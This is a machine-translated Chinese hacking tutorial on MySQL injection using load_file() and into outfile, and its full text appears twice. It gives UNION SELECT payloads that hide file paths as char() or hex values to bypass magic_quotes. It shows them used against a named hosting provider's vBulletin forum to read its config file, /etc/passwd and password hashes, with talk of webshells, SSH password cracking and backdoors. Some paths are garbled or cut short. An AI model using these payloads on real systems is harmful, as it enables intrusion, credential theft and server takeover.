Text/Photo: Security Angel angel[BST] Reprinted from http:// Author: angel
Preface
My "SQL Injection with MySQL" (a special topic in "Hacker Defense" in July) has already given a relatively comprehensive introduction to MySQL injection, but there is a function that is quite harmful. I did not mention it in the article, because if this function can be applied flexibly, the security of PHP and even the server will be greatly reduced. Since "SQL Injection with MySQL" was published during the summer vacation. Considering that many novices, students and people with bad morals are used randomly, I did not write this in this article. In fact, this article was completed in early May. After the special topic was published, many people have turned to the research on PHP+MYSQL injection, and many new technologies will be explored one after another, and the advanced skills we have mastered in this area will be announced one after another. As for the more basic things, this article will not mention them again.
detailed
We know that in SQL statements, various built-in functions can be used. The functions that are often used are DATABASE(), USER(), SYSTEM_USER(), SESSION_USER(), and CURRENT_USER() to obtain some system information. There is also a function that is more widely used, which is load_file(). The function of this function is to read the file and return the file content as a string.
After seeing this, you should think of what we can do, which is to read some confidential files, but there are also conditions:
To read the file, you must be on the server.
The complete path of the file must be specified.
Must have permission to read and the file must be fully readable.
To read the file, it must be less than max_allowed_packet
If the file does not exist, or cannot be read out for any of the above reasons, the function returns empty. What is more difficult to satisfy is permissions. In Windows, if NTFS is set properly, the relevant files cannot be read. When encountering files that only administrators can access, users do not want to load_file.
In actual injection, we have two difficulties to solve:
Absolute physical path
Construct effective deformed statements
In many PHP programs, when submitting an error Query, if display_errors = on, the program will expose the absolute path of the WEB directory. As long as the path is known, the security of the entire server will be seriously threatened for a PHP program that can be injected. Constructing a sentence is already a little bit.
use
Let's assume that the SQL statement of a program is as follows:
SELECT * FROM article WHERE articleid=$id
Note: Current conditions: magic_quotes_gpc = off, c:/readable.
At this time, we construct $id as:
-1 union select 1,1,1,1,load_file(c:/)
Our Query becomes:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file(c:/)
The program will display the c:/ content honestly, but now there are very few hosts for magic_quotes_gpc = off. How can we construct statements without quotes? Friends who have read "SQL Injection with MySQL" must know to use the char() function or convert characters into hexadecimal. Yes, they are them.
Note: Current conditions: magic_quotes_gpc = on, c:/readable.
We construct $id as:
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
"char(99,58,47,98,111,111,116,46,105,110,105)" is the ASCII code of "c:/", and our Query becomes:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
We can also successfully read the file, and convert the string into hexadecimal. The hexadecimal of "c:/" is "0x633a2f626f6f742e696e69", so the above statement can be like this:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
It's relatively short, depending on everyone's preferences, you can enter the following query under phpmyadmin or mysql> to study it slowly.
SELECT load_file([string])
Of course, in actual applications, due to various conditional restrictions, the content of the file may not be displayed, and we can also use into outfile to export the file. Everyone already knows how to use it, and I won’t talk about the details anymore. See an example to illustrate everything.
Example
www.*** is a famous FreeBSD hosting provider in my country. Let’s use it to test it because its forum uses a problematic VBB forum, so I don’t need to look for sites with vulnerabilities everywhere (although it is everywhere). This is a complete security test. Just getting information, I did not enter the server.
Here is a little more explanation about a piece of code in the root directory of VBB, as follows:
// get rid of slashes in get / post / cookie data
function stripslashesarray (&$arr) {
while (list($key,$val)=each($arr)) {
if ($key!="templatesused" and $key!="argc" and $key!="argv") {
if (is_string($val) AND (strtoupper($key)!=$key OR ("".intval($key)=="$key"))) {
$arr["$key"] = stripslashes($val);
} else if (is_array($val) AND ($key == HTTP_POST_VARS OR $key == HTTP_GET_VARS OR strtoupper($key)!=$key)) {
$arr["$key"] = stripslashesarray($val);
}
}
}
return $arr;
}
if (get_magic_quotes_gpc() and is_array($GLOBALS)) {
if (isset($attachment)) {
$GLOBALS[attachment] = addslashes($GLOBALS[attachment]);
}
if (isset($avatarfile)) {
$GLOBALS[avatarfile] = addslashes($GLOBALS[avatarfile]);
}
$GLOBALS = stripslashesarray($GLOBALS);
}
set_magic_quotes_runtime(0);
The purpose of this code is to remove the escape characters in front of all special characters if magic_quotes_gpc is opened. Therefore, no matter the status of magic_quotes_gpc in it, the single quotes we entered have no effect, so everyone can inject it with confidence. hehe.
We know, submit:
/?action=edit&eventid=1 UNION SELECT 1,1,1,1,username,password FROM user WHERE userid=1
It is possible to get the username and password MD5 hash, but it is not displayed for special reasons. However, based on my experience, we know that there is no error in the construction, so we can read and export it into a file.
Because I accidentally accessed the file containing phpinfo() in advance, I knew the absolute path of WEB. From the results of visiting the site, I found that a download system generates HTML files. If that directory does not have writable permissions, it cannot generate HTML files. However, all this is not the focus of this article. We now have the following information:
WEB absolute path: /home/4ngel
Writable directory path: /home/4ngel/soft/
magic_quotes_gpc = on
Compared with host root, the admin of the forum is nothing at all. I am not interested in the admin of the forum. We want to read the configuration file of the forum and /etc/passwd. To know the connection information of MySQL, you can start from here and write webshell or other things. If you know /etc/passwd, we can run the password. Go straight up from ssh.
The configuration file of the VBB forum is converted into ASCII code in /home/4ngel/forum/admin/, and submitted:
?action=edit&eventid=1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile /home/4ngel/soft/
Haha, remember to add a where to set a condition, otherwise if there are many forum users, the exported file will be quite large. Or simply specify $eventid as a non-existent value, and don't need where, just like this:
?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user into outfile /home/4ngel/soft/
Convert /etc/passwd to ASCII code, submit:
?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1, load_file (char(47,101,116,99,47,112,97,115,115,119,100)) FROM user into outfile /home/4ngel/soft/
Note that if you see the top of the forum, the following error message will appear:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line 154
Experience tells us that the file export was successful and submit:
/soft/
/soft/
The content came out loud, and when the dark night and pig eggs invaded the gray, they showed their passwords one by one, deceived, logged in to the background, uploaded the backdoor, read, and a series of steps. I got it done with one load_file(). Is it very harmful? As shown in the picture:
I remember in a group that everyone was talking about the 9****.net site and those who entered the black and white server had no way to rush towards the black and white, so they had to make a curve. Use the load_file() function to know some information, you can enter the server where black and white is located. The process is the same as above. The vulnerability is used to directly load_file to output the program's configuration file. Know the information of mysql, remotely connect, write database export files, and it is easy to obtain the server admin.
postscript
Because the harm is too great, I have never dared to publish it. I believe that some people in China know about it. It's just not public. After repeated consideration, I decided to publish it. I hope that after you have mastered it, you will not do any destructive operations on domestic sites. Thanks for the cooperation!
Preface
My "SQL Injection with MySQL" (a special topic in "Hacker Defense" in July) has already given a relatively comprehensive introduction to MySQL injection, but there is a function that is quite harmful. I did not mention it in the article, because if this function can be applied flexibly, the security of PHP and even the server will be greatly reduced. Since "SQL Injection with MySQL" was published during the summer vacation. Considering that many novices, students and people with bad morals are used randomly, I did not write this in this article. In fact, this article was completed in early May. After the special topic was published, many people have turned to the research on PHP+MYSQL injection, and many new technologies will be explored one after another, and the advanced skills we have mastered in this area will be announced one after another. As for the more basic things, this article will not mention them again.
detailed
We know that in SQL statements, various built-in functions can be used. The functions that are often used are DATABASE(), USER(), SYSTEM_USER(), SESSION_USER(), and CURRENT_USER() to obtain some system information. There is also a function that is more widely used, which is load_file(). The function of this function is to read the file and return the file content as a string.
After seeing this, you should think of what we can do, which is to read some confidential files, but there are also conditions:
To read the file, you must be on the server.
The complete path of the file must be specified.
Must have permission to read and the file must be fully readable.
To read the file, it must be less than max_allowed_packet
If the file does not exist, or cannot be read out for any of the above reasons, the function returns empty. What is more difficult to satisfy is permissions. In Windows, if NTFS is set properly, the relevant files cannot be read. When encountering files that only administrators can access, users do not want to load_file.
In actual injection, we have two difficulties to solve:
Absolute physical path
Construct effective deformed statements
In many PHP programs, when submitting an error Query, if display_errors = on, the program will expose the absolute path of the WEB directory. As long as the path is known, the security of the entire server will be seriously threatened for a PHP program that can be injected. Constructing a sentence is already a little bit.
use
Let's assume that the SQL statement of a program is as follows:
SELECT * FROM article WHERE articleid=$id
Note: Current conditions: magic_quotes_gpc = off, c:/readable.
At this time, we construct $id as:
-1 union select 1,1,1,1,load_file(c:/)
Our Query becomes:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,1,load_file(c:/)
The program will display the c:/ content honestly, but now there are very few hosts for magic_quotes_gpc = off. How can we construct statements without quotes? Friends who have read "SQL Injection with MySQL" must know to use the char() function or convert characters into hexadecimal. Yes, they are them.
Note: Current conditions: magic_quotes_gpc = on, c:/readable.
We construct $id as:
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
"char(99,58,47,98,111,111,116,46,105,110,105)" is the ASCII code of "c:/", and our Query becomes:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
We can also successfully read the file, and convert the string into hexadecimal. The hexadecimal of "c:/" is "0x633a2f626f6f742e696e69", so the above statement can be like this:
SELECT * FROM article WHERE articleid=-1 union select 1,1,1,load_file(0x633a2f626f6f742e696e69)
It's relatively short, depending on everyone's preferences, you can enter the following query under phpmyadmin or mysql> to study it slowly.
SELECT load_file([string])
Of course, in actual applications, due to various conditional restrictions, the content of the file may not be displayed, and we can also use into outfile to export the file. Everyone already knows how to use it, and I won’t talk about the details anymore. See an example to illustrate everything.
Example
www.*** is a famous FreeBSD hosting provider in my country. Let’s use it to test it because its forum uses a problematic VBB forum, so I don’t need to look for sites with vulnerabilities everywhere (although it is everywhere). This is a complete security test. Just getting information, I did not enter the server.
Here is a little more explanation about a piece of code in the root directory of VBB, as follows:
// get rid of slashes in get / post / cookie data
function stripslashesarray (&$arr) {
while (list($key,$val)=each($arr)) {
if ($key!="templatesused" and $key!="argc" and $key!="argv") {
if (is_string($val) AND (strtoupper($key)!=$key OR ("".intval($key)=="$key"))) {
$arr["$key"] = stripslashes($val);
} else if (is_array($val) AND ($key == HTTP_POST_VARS OR $key == HTTP_GET_VARS OR strtoupper($key)!=$key)) {
$arr["$key"] = stripslashesarray($val);
}
}
}
return $arr;
}
if (get_magic_quotes_gpc() and is_array($GLOBALS)) {
if (isset($attachment)) {
$GLOBALS[attachment] = addslashes($GLOBALS[attachment]);
}
if (isset($avatarfile)) {
$GLOBALS[avatarfile] = addslashes($GLOBALS[avatarfile]);
}
$GLOBALS = stripslashesarray($GLOBALS);
}
set_magic_quotes_runtime(0);
The purpose of this code is to remove the escape characters in front of all special characters if magic_quotes_gpc is opened. Therefore, no matter the status of magic_quotes_gpc in it, the single quotes we entered have no effect, so everyone can inject it with confidence. hehe.
We know, submit:
/?action=edit&eventid=1 UNION SELECT 1,1,1,1,username,password FROM user WHERE userid=1
It is possible to get the username and password MD5 hash, but it is not displayed for special reasons. However, based on my experience, we know that there is no error in the construction, so we can read and export it into a file.
Because I accidentally accessed the file containing phpinfo() in advance, I knew the absolute path of WEB. From the results of visiting the site, I found that a download system generates HTML files. If that directory does not have writable permissions, it cannot generate HTML files. However, all this is not the focus of this article. We now have the following information:
WEB absolute path: /home/4ngel
Writable directory path: /home/4ngel/soft/
magic_quotes_gpc = on
Compared with host root, the admin of the forum is nothing at all. I am not interested in the admin of the forum. We want to read the configuration file of the forum and /etc/passwd. To know the connection information of MySQL, you can start from here and write webshell or other things. If you know /etc/passwd, we can run the password. Go straight up from ssh.
The configuration file of the VBB forum is converted into ASCII code in /home/4ngel/forum/admin/, and submitted:
?action=edit&eventid=1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user WHERE userid=1 into outfile /home/4ngel/soft/
Haha, remember to add a where to set a condition, otherwise if there are many forum users, the exported file will be quite large. Or simply specify $eventid as a non-existent value, and don't need where, just like this:
?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) FROM user into outfile /home/4ngel/soft/
Convert /etc/passwd to ASCII code, submit:
?action=edit&eventid=-1 UNION SELECT 1,1,1,1,1, load_file (char(47,101,116,99,47,112,97,115,115,119,100)) FROM user into outfile /home/4ngel/soft/
Note that if you see the top of the forum, the following error message will appear:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line 154
Experience tells us that the file export was successful and submit:
/soft/
/soft/
The content came out loud, and when the dark night and pig eggs invaded the gray, they showed their passwords one by one, deceived, logged in to the background, uploaded the backdoor, read, and a series of steps. I got it done with one load_file(). Is it very harmful? As shown in the picture:
I remember in a group that everyone was talking about the 9****.net site and those who entered the black and white server had no way to rush towards the black and white, so they had to make a curve. Use the load_file() function to know some information, you can enter the server where black and white is located. The process is the same as above. The vulnerability is used to directly load_file to output the program's configuration file. Know the information of mysql, remotely connect, write database export files, and it is easy to obtain the server admin.
postscript
Because the harm is too great, I have never dared to publish it. I believe that some people in China know about it. It's just not public. After repeated consideration, I decided to publish it. I hope that after you have mastered it, you will not do any destructive operations on domestic sites. Thanks for the cooperation!